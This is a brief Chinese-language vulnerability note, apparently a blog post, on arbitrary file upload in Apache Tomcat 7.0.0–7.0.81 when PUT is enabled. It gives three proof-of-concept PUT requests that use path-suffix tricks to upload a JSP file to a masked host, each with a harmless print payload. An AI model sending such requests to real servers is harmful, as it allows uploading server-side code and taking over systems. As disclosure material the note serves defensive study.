前言

记Tomcat开启PUT后的任意文件上传

影响版本

7.0.0 - 7.0.81

需要因素

conf/web.xml文件添加readonly参数,属性值为false

POC:

1
2
3
4
5
PUT /test.jsp::$DATA HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>
1
2
3
4
5
PUT /test.jsp/ HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>
1
2
3
4
5
PUT /test.jsp/. HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>